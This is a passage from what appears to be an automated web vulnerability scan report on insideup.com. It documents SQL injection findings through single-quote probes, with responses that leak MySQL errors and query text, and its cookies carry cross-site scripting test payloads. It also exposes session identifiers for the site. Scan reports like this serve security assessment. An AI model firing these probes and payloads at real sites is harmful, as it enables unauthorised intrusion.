OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:19:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=65c4m7a96cir3pppnosunh6ge4; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/project_dynamic_page_updated.php was not found on this server.</p>

1.156. http://www.insideup.com/ppc/leadflow/caad00/project_dynamic_page_updated.php [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project_dynamic_page_updated.php

Issue detail

The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00'&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:20:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nmt6pa8cskm369ci4bqrcmvaq1; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00'&template=3' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00''&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:20:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nsfrlu379rh4icclk22c5fjf13; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/project_dynamic_page_updated.php was not found on this server.</p>

1.157. http://www.insideup.com/ppc/leadflow/caad00/project_dynamic_page_updated.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project_dynamic_page_updated.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:25:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q2aq8ni09drjd00hd354nhi4i2; path=/
Content-Length: 2518
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3&1'=1' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 